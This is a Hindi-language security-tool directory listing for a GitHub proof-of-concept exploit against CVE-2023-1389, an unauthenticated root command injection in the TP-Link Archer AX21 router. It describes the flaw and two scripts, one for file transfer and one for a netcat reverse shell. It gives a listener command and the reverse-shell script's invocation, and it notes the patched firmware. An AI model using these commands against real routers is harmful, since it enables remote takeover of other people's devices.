Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/voyag3r-security/cve-2023-1389
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

CVE-2023-1389 के लिए प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट, जो TP-Link Archer AX21 में एक अनप्रमाणित कमांड इंजेक्शन है, जो फ़ाइल स्थानांतरण और रिवर्स शेल क्षमताएँ प्रदान करती है।

रिपॉजिटरी देखें
17743 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

CVE-2023–1389 TP-Link Archer AX21 WiFi राउटर में एक बिना प्रमाणीकरण वाली कमांड इंजेक्शन भेद्यता है। country पैरामीटर में एक कॉलबैक popen() फ़ंक्शन का उपयोग करता है, जो रूट के रूप में चलता है, जिससे हमलावर प्रमाणीकरण की आवश्यकता के बिना, प्रशासनिक इंटरफ़ेस पर GET या POST अनुरोधों के माध्यम से मनमाने मानों को इंजेक्ट कर सकता है। भेद्यता के बारे में अधिक जानकारी यहाँ पाई जा सकती है।

ये कुछ Proof-of-Concepts हैं जो मैंने कमांड इंजेक्शन का पता लगाते समय बनाए थे। Archer-file-transfer.py पहला संस्करण था और यह जिस तरह से इंटरैक्शन प्राप्त करता है वह काफी जटिल है। Archer-rev-shell.py आपको एक सरल netcat रिवर्स शेल देता है, और संभवतः आप इसी के लिए यहाँ आए हैं। यदि आप इन स्क्रिप्ट्स के विकास के बारे में अधिक जानना चाहते हैं तो आप पोस्ट यहाँ पढ़ सकते हैं।

उपयोग

एक टर्मिनल विंडो में:

root@kitploit:~
nc your_IP listener_port

दूसरे टर्मिनल विंडो में:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

शमन

TP-Link ने फर्मवेयर संस्करण 1.1.4 Build 20230219 जारी किया है जो कमजोर कॉलबैक को हटाकर समस्या का समाधान करता है। अपने राउटर को नवीनतम फर्मवेयर में अपडेट करने से आपका डिवाइस सुरक्षित रहना चाहिए।

भविष्य

मैं संभवतः इन PoCs को बनाए नहीं रखूँगा। दोनों काफी सरल हैं और आवश्यकतानुसार संशोधित करना आसान होना चाहिए।

टूल डाउनलोड करें